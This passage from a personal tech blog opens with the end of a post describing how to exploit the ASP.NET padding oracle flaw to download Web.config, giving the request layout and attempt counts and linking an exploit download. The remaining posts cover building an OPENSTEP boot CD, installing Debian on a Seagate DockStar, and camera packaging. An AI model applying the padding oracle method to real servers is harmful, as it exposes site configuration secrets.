If the attacker can not find an existing ScriptResource usage that has the “Q|” prefix, then it comes down to being able to craft a ciphertext block that would correspond to having a 2-character prefix of “r#”, “R#”, “Q#”, or “q#”.  This is not trivial, but still boils down to only being able to forge a single block.  Because of the nature of block cryptography, a block with the correct prefix could be forged in at most 256*256/4 (~16000) attempts.  Once that single block is forged, then it can be used as the prefix to the attack request where there is still a garbled block in the middle and a file download at the tail end of the attack.  The attack request will be composed of: “prefix” + “garbled block” + “|||~/Web.config”.

16000 HTTP requests.  8000 requests on average.  It’s not a big number and can be done in a matter of minutes.

The provided code has more inline comments on it.  The constants in the code should be substituted with what’s obtained from visual inspection of the generated HTML file for a page.

//peterwong.net/files/PaddingOracleExploit.zip

Posted in ASP.NET | Tagged , | 1 Comment

Creating an OPENSTEP Boot CD

How OPENSTEP 4.2 boots in m68k hardware.

A NEXTSTEP/OPENSTEP CD cannot be made to boot in both sparc and m68k hardware.  With NEXTSTEP 3.3, there was one installation CD for m68k/i386 and another installation CD for sparc/hppa.  For sparc, the hardware expects the bootloader to start at offset 0x00000200 (512) of the CD.  For m68k, the hardware expects a disklabel at the very start of the CD, and the disklabel contains a pointer to the bootloader somewhere else in the CD.  A disklabel is 7240 bytes in size and cannot fit into the available first 512 bytes of a sparc-bootable CD.

With OPENSTEP 4.2, there was a single "User" installation CD for m68k/i386/sparc (I think they dropped support for the hppa platform at that time).  Given those three platforms, NeXT probably opted to make the CD bootable on sparc hardware.  The sparc magic number 01 03 01 07 is present at offset 0x00000200 of the CD.  Note that to boot from a CD, sparc workstations need SCSI CDROM drives that provide 512-byte sectors, instead of the more common 2048-byte sectors.  Older drives from Plextor, Yamaha, and Pioneer typically have a jumper that sets the sector size.  Trying to boot the CD from m68k hardware gives the following error:

  Bad version 0x80000000
  Bad cksum
  Bad version 0x0
  Bad cksum
  Bad label

An m68k/i386 installation diskette and an i386 driver diskette were provided in 3.5" 1.44MB format.  The installation diskette is used to bootstrap the installation into m68k hardware.  I could not find an m68k bootloader anywhere in the installation diskette, which leads me to think that the boot process probably traps into the m68k ROM, which then loads a copy of the disklabel from either offset 0x00002000 or offset 0x00003C00 of the CD.  From the disklabel, the m68k bootloader can be located in the CD and the boot process continues, loading the m68k kernel "sdmach".

How OPENSTEP 4.2 boots in i386 hardware.

An i386 ROM loads the i386 initial "B1" bootloader from the first 512 bytes of the diskette.  The initial bootloader loads the standard i386 bootloader from offset 0x00008000 of the diskette.  In the boot process, the i386 kernel "mach_kernel" is loaded, "sarld" is loaded, the user is prompted to insert the driver diskette, drivers are loaded (the driver for the IDE or SCSI CD drive needs to be loaded so the CD can be read), and installation copies files from the CD into the hard disk.

Creating an m68k-bootable "User" OPENSTEP CD.

Since m68k hardware looks for a disklabel at the start of the CD, we need only to copy the duplicate disklabel located at offset 0x00002000 or offset 0x00003C00 of the CD.  From a raw "ISO" image of the OPENSTEP 4.2 CD, the disklabel can be extracted with:

  dd bs=1 count=7680 if=OPENSTEP42CD.iso of=OPENSTEP42CD.lbl skip=8192

Overlay the extracted disklabel into the first part of the CD image:

  dd bs=1 count=7680 if=OPENSTEP42CD.lbl of=OPENSTEP42CD.iso

Several bytes in the disklabel need to be changed.  The structure of the disklabel is available at bootblock.h.  The first set that needs to be changed is the block number in the disklabel.  If the disklabel originally came from offset 0x00002000, then its block number is 4 (where a block is 2048 bytes).  The new disklabel at the start of the disk should be at block number 0.

The second set of bytes that need to be changed is the pointer to the boot blocks (bootloader).  There are two pointers in the disklabel.  The first points to an hppa bootloader (block 0x10), and the second points to an m68k bootloader (block 0x30).  The hppa bootloader surprised me because I thought hppa platform support has been dropped in OPENSTEP.  Also note that the sparc bootloader that started at offset 0x00000200 has been partially overlaid by the new disklabel, so the new CD image will not be sparc-bootable.  We change the boot block pointers in the disklabel to point only to the m68k boot blocks — first pointer is set to 0x30, second pointer is set to 0xFFFFFFFF.

The third set of bytes that need to be changed is the default kernel loaded by the bootloader.  From the original disklabel, the kernel name is "mach_kernel".  Although "mach_kernel" is present on the CD, it is a tri-fat binary.  The m68k bootloader cannot load the tri-fat binary, and instead needs to load the Mach-O binary "sdmach".  Although you can manually specify the kernel name on the ROM boot prompt, the disklabel is altered to use "sdmach" instead of "mach_kernel" as the default.

The last set of bytes that need to be changed is a checksum on the disklabel.  NS_CKSUM.C is a very short program that illustrates the checksum calculation.  It reads the bytes in the disklabel preceding the checksum itself, and outputs a 16-bit hexadecimal value to use as the new checksum.  With the updated OPENSTEP 4.2 CD disklabel, the checksum calculated is 0xCE22.

Creating an i386-bootable "User" OPENSTEP CD.

The i386 bootloader is located on the install diskette boot blocks.  This is a copy of the /usr/standalone/i386/boot binary located on the CD.  Additionally, the first 512 bytes of the diskette contains a copy of the /usr/standalone/i386/boot1f binary.  Unlike m68k hardware, i386 hardware does not bootstrap from the first few blocks of the CD.  Instead, i386 hardware makes use of the El Torito specification for bootstrapping from a CD.  The El Torito specification was developed by Phoenix and IBM.  With an El Torito CD, a bootstrap image is loaded by the BIOS.  The bootstrap image can be treated as a diskette in drive "A:".

One limitation in El Torito is that you can only bootstrap a single image.  Although it allows you to select from multiple bootstrap images on the CD, you only bootstrap one of the images ("B:" cannot be mapped to another image in the CD).  You also cannot "swap" images during the El Torito boot process, as required by the OPENSTEP i386 installation process where it asks that you eject the install diskette and insert the driver diskette.

With "mach_kernel" and "sarld", no additional drivers can fit in a 1.44MB install diskette.  The good thing in El Torito is that the bootstrap image can be the image of a 2.88MB diskette.  If we can combine the OPENSTEP install diskette and driver diskette into a single 2.88MB diskette, it can be used to boot from the CD.

There are several ways to create the 2.88MB diskette.  One way is to use an actual 2.88MB SCSI diskette drive and initialize a 2.88MB diskette appropriately, then copy the contents of both OPENSTEP diskettes into the new diskette.  Since I was currently working on a Windows box, I opted to use a virtual machine running OPENSTEP to set up the diskette image.

First, create a 2.88MB file (2,949,120 bytes).  You can use any available utility to create a file of that exact size.  The contents do not matter, since it will be re-initialized from within OPENSTEP.  I tried to mount the 2.88MB file as a virtual floppy drive in VirtualBox.  However, when treated as a floppy drive, the OPENSTEP i386 floppy driver refuses to initialize it as 2.88MB, citing that 1.44MB is the limit.  VirtualBox does not provide a BIOS configuration screen where you can change "A:" into a 2.88MB drive.  Virtual PC 2007 has the BIOS configuration screen, but as reported by others, OPENSTEP installation causes a processor exception in Virtual PC 2007.

The 2.88MB file is mounted as a virtual IDE disk in VirtualBox.  The VMware-format F288.vmdk file is used to describe the virtual disk F288.img as having 160 cylinders, 2 heads, and 18 sectors/track.  IDE sectors are 512 bytes in length, giving a total of 160*2*18*512 = 2.88MB.

Once assigned in VirtualBox running OPENSTEP, the 2.88MB disk is initialized as:

  /usr/etc/disk -i -b -B1 /usr/standalone/i386/boot1f /dev/rhd1a 

The new disk is mounted:

  mkdir /F288 
  mount /dev/hd1a /F288 

And files copied from the install diskette and driver diskettes:

  cp -r /4.2mach_Install/* /F288 
  cp -r /4.2mach_Drivers/* /F288 

Not all the drivers will fit, so some of them should not be copied.  I opted to not copy most of the SCSI drivers, since I will be installing from an IDE/ATAPI CD drive.  The /F288/private/Drivers/i386/System.config/Instance0.table is edited so "Prompt For Driver Disk" is "No".  We now have a 2.88MB "F288.img" file that can be used as the El Torito bootstrap image.

How do we combine the OPENSTEP 4.2 CD, and the 2.88MB bootstrap image into a single El Torito ISO9660 CD?  The OPENSTEP 4.2 CD is not in ISO9660 format.  It is in a variant of the 4.3BSD UFS format.  What’s great in this format is that the UFS filesystem is in a "relative" location in the CD.  In bootblock.h, the disklabel specifies the size (in blocks) of the "front porch" that precedes the actual UFS filesystem.  The "front porch" contains disk housekeeping information and precedes the UFS filesystem.  The raw UFS filesystem can be extracted from the CD image with:

  dd bs=2048 if=OPENSTEP42CD.iso of=OPENSTEP42CD.ufs skip=80

Having "F288.img" and "OPENSTEP42CD.ufs", we fire up our disk-burning application to create an El Toriro CD image.  The ISO9660 filesystem contains only the single OPENSTEP42CD.ufs file.  With the CD image created, we can find that the UFS filesystem got stored starting at offset 0x00360000.

We need to put the same block 0 disklabel into the CD image, but several bytes need to be changed.  The first set of bytes that need to be changed is the size of the "front porch".  Since the UFS filesystem has been moved to offset 0x00360000, the "front porch" value should be 0x06C0 (1728 blocks).  The other set of bytes that need to be changed is the checksum on the disklabel.  With this updated disklabel, the checksum calculated is 0xD492.

The disklabel is again overlayed into the start of the CD image:

  dd bs=1 count=7680 if=OPENSTEP42CD.Block00.ElTorito.lbl of=Disc.iso

Creating an m68k-bootable and i386-bootable OPENSTEP CD.

Extending the concepts further, we can create a CD that is bootable in both m68k and i386 hardware.  The ISO9660 volume descriptors start at offset 0x00008000 (block 16).  32KB is not enough to fit a disk label and an m68k bootloader.  The /usr/standalone/boot.cdrom file is 49812 bytes in size.

For this El Torito CD image, the ISO9660 file system contains the two files boot.cdrom and OPENSTEP42CD.ufs, along with the 2.88MB bootstrap image.  A few changes are in order for the disklabel.  The UFS file system now starts at offset 0x0036C800 of the CD, so the "front porch" value should be 0x06D9 (1753 blocks).  The boot.cdrom image starts at offset 0x0036C000 of the CD.  The first boot block pointer should be 0x06C0, and the second boot block pointer is left as 0xFFFFFFFF.  The new checksum of the disklabel is 0xDB3B.

The disklabel is again overlayed into the start of the CD image:

  dd bs=1 count=7680 if=OPENSTEP42CD.Block00.ElTorito.m68k.lbl of=Disc.iso

With those changes to Disc.iso, the image can be burned to a CD which is bootable in both m68k platforms (as long as you have the latest ROM that allows booting from the CD) and i386 platforms.

Miscellaneous files for download.
Posted in Retrocomputing | 11 Comments

Debian on a Seagate DockStar

I bought a Seagate DockStar a couple of months ago.  What attracted me to this device was its size, its low price (compared to other Plug Computers), and support for a standard Linux Debian distribution.  I would have wanted something that I could install Ubuntu on, but Ubuntu does not provide support for the ARM v5 architecture.  I’m okay with Debian though, and Debian provides packages to this “armel” device even in their “squeeze” testing release.

SeagateFreeAgentDockStar-2

The DockStar has 128MB of RAM and 256MB of flash memory.  It has 4 USB ports, and unlike other Plug Computers, the ports are powered so you can attach regular USB thumb drives as well as higher-capacity portable drives.  The factory setting has the NAND flash memory set into four partitions.  The first partition mtd0 (1 MB) contains a very old U-Boot bootloader.  The second partition mtd1 (4 MB) contains a Linux kernel image, and the third partition mtd2 (32 MB) contains a Linux jffs2 file system.  The remaining partition mtd3 (219 MB) is unused.

Hacking the DockStar to boot a different Linux system from a USB drive all stemmed from the instructions initially posted at http://ahsoftware.de/dockstar/.  In essence, the bootloader environment variables are changed to cause the mtd0 bootloader to chain to another bootloader that gets installed at mtd3.  The installed mtd3 bootloader can then check for USB drives and boot the Linux kernel from there.

To accommodate a fallback to the original Pogoplug environment in case the USB drive fails to boot, a “switching” approach was made to the bootloader environment variables – that is, at each boot, the variables would be changed between booting the mtd1 kernel and booting a USB drive kernel.  However, the bootloader environment variables are themselves stored somewhere in mtd0, so this switching approach may potentially be a cause of your device getting bricked (if something fails in the update to mtd0).  Because of technical limitations, the installed mtd3 chained bootloader cannot be made to boot back into the mtd1 kernel if it fails to boot the USB drive.  Some users have opted to configure the boot sequence such that it always tries the USB drive, but does not change the bootloader variables in mtd0.  If the USB boot fails, the USB drive can just be mounted on another machine and get fixed.

Although it’s been desired by all that mtd0 should not be updated on every boot, there were discussions on whether the old U-Boot bootloader at mtd0 should just be updated.  It’s true that writing to the mtd0 U-Boot has its risks, but mtd0 is being re-written anyway (on every boot) if the switching mechanism is used.  So a one-time update to mtd0 sounds more reasonable.  This also frees up mtd3 for installing other things, like maybe a very small 219 MB Linux installation.

Step 1.  Prevent the DockStar from “phoning home”.

Out of the box, if you connect the DockStar to your network, it will retrieve firmware updates and disable ssh on the device.  To prevent this, I disconnected my home router from the Internet, but had it still responding to DHCP requests.  There is often a page from the mini web server in your router that lists out the IP addresses it has handed out, so that you can determine what IP address the DockStar received via DHCP.  Knowing that, you could ssh into the DockStar with the default password, comment out the script command that runs the Pogoplug software (which retrieves the firmware update from the Internet) and save that back into flash memory.  This is documented in http://ahsoftware.de/dockstar/.  It’s been mentioned that it’s better to just add a command to kill the offending process, so that other kernel modules can get loaded.  But I do not trust any executable from the cloudengines directory to not “phone home”, so I’m fine with disabling the whole script.

Step 2.  Update the mtd0 U-Boot and environment variables.

Jeff Doozan has been active on getting this done easily, and great instructions are posted at http://jeff.doozan.com/debian/uboot/ and subsequently adopted at http://www.plugapps.com/index.php5?title=PlugApps:Pogoplug_Setboot

Step 3.  Install the Debian “squeeze” release into a USB drive.

I opted to cross-install Debian’s armel distribution using debootstrap.  Since I was working from an Ubuntu desktop machine, my USB drive was at /dev/sdb.  I made three partitions (one 1GB ext3 partition, one 1GB swap partition, and another ext3 partition) and used the following to create the file systems:

    sudo mkfs -t ext3 /dev/sdb1
    sudo mkswap /dev/sdb2
    sudo mkfs -t ext3 /dev/sdb3

I obtained and used the cross-platform bootstrapper.  I opted to include the ntp package (because the DockStar does not have a battery-backed RTC), the USB automounter, the ssh server, the U-Boot image utilities, and the Linux kernel at this time.  Other packages can be installed later once we get the DockStar to boot from the USB drive.

    sudo apt-get install debootstrap
    sudo mount /dev/sdb1 /mnt
    sudo /usr/sbin/debootstrap --foreign --arch=armel \
        --include=ntp,usbmount,openssh-server,uboot-mkimage,linux-image-2.6.32-5-kirkwood \
        squeeze /mnt http://ftp.us.debian.org/debian
    sudo umount /mnt

Unmount the USB drive from the desktop and attach it to the DockStar.  The DockStar will still boot to the Pogoplug environment since there isn’t a valid U-Boot kernel image at the USB drive at this time.  After ssh’ing into the DockStar:

    mount /dev/sda1 /mnt
    /usr/sbin/chroot /mnt /bin/bash
    PATH=/usr/sbin:/sbin:$PATH
    mount -t proc none /proc
    /debootstrap/debootstrap --second-stage

Although some prebuilt kernels are available at http://sheeva.with-linux.com/sheeva/, I opted to use the standard kernel from Debian:

    mkimage -A arm -O linux -T kernel -C none -a 0x8000 -e 0x8000 \
        -n "vmlinuz-2.6.32-5-kirkwood" -d /vmlinuz /boot/uImage
    mkimage -A arm -O linux -T ramdisk -C gzip -a 0 -e 0 \
        -n "initrd.img-2.6.32-5-kirkwood" -d /initrd.img /boot/uInitrd

I then performed some housekeeping stuff before the reboot of the DockStar:

    echo "dockstar" > /etc/hostname
    echo "LANG=C" > /etc/default/locale
    echo "/dev/sda1 / ext3 defaults 0 1" >> /etc/fstab
    echo "/dev/sda2 none swap sw 0 0" >> /etc/fstab
    echo "none /proc proc defaults 0 0" >> /etc/fstab
    echo "auto lo" >> /etc/network/interfaces
    echo "iface lo inet loopback" >> /etc/network/interfaces
    echo "auto eth0" >> /etc/network/interfaces
    echo "iface eth0 inet dhcp" >> /etc/network/interfaces
    echo "deb http://ftp.us.debian.org/debian squeeze main" >> /etc/apt/sources.list
    echo "deb-src http://ftp.us.debian.org/debian squeeze main" >> /etc/apt/sources.list
    echo "America/Los_Angeles" > /etc/timezone
    cp /usr/share/zoneinfo/America/Los_Angeles /etc/localtime
    passwd root
I exit back to the Pogoplug-based environment and unmount the USB drive.
    exit
    umount /mnt
Step 4.  Boot into the Debian system.

Once the Debian system is setup in the USB drive, you can issue a standard /sbin/reboot.  The updated bootloader would see a kernel image in the USB drive and boot the Debian system we have just installed.  From another machine, you can ssh into the DockStar and install additional packages, for example:

    apt-get install apache2
    apt-get install dpkg-dev
    apt-get install netatalk    

And there you have it.  A full Debian “squeeze” installation in an “armel” device.  With Apache, it becomes a full-pledged headless web server.  With the USB ports, it’s very convenient to transfer files into the system using USB thumb drives and make them available throughout your network.

 

Update 10/30/2010: Corrected pre-formatted text and added additional housekeeping commands.

Posted in Computers | Tagged , | 15 Comments

The Shrinking Digital Camera Packaging

Have you noticed how consumer packaging for certain electronics have shrunk over the years?  I’m amazed with how that’s happened with digital cameras.  My oldest digital camera was an Apple QuickTake 100 which was one of the earliest consumer digital cameras (providing storage for 8 whopping 640×480 digital pictures or 32 of the smaller 320×240 pictures).  Its box was about the size of how netbooks are packaged now — about a couple of reams of paper stacked upon each other.

Apple QuickTake 100-1

Going through several digital cameras over the years, packaging was significantly smaller.  I’ve had a Minolta, a Kodak, and a Nikon digital camera, all packaged about the same size.  Judith needed a new point-and-shoot camera to quickly catch pictures of the family during events, without having to lug around our digital SLR.  We ended up getting a Panasonic HF-20 and the size of its packaging was a mere several CD jewel cases.  Just enough to stick the camera in, with some accessories, cables, a CD, and a thin “getting-started” booklet.  Just amazing!

IMG_8071

Posted in Around the House | Tagged | Leave a comment